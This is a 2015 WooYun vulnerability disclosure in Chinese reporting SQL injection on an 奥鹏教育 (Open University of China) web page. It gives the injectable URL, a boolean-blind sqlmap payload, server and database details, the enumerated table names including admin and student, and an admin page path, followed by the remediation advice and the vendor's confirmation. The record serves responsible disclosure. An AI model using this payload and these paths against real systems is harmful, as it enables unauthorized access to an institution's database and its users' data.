乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-23: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
奥鹏教育SQL注入漏洞
1.注入点
http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/xxzy.asp?id=9 (GET)
2.
sqlmap identified the following injection points with a total of 75 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=9 AND 2318=2318 Vector: AND [INFERENCE]---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Accesssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=9 AND 2318=2318 Vector: AND [INFERENCE]---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[8 tables]+------------+| admin || dictionary || news || question || student || system || type || upload |+------------+
3.
http://media4.open.com.cn/L603/dongshi/zonghehxsy/admin/manage.asp
4
1.注入参数过滤2.后台访问限制
危害等级:高
漏洞Rank:18
确认时间:2015-10-27 09:32
已通知相关人员处理。
暂无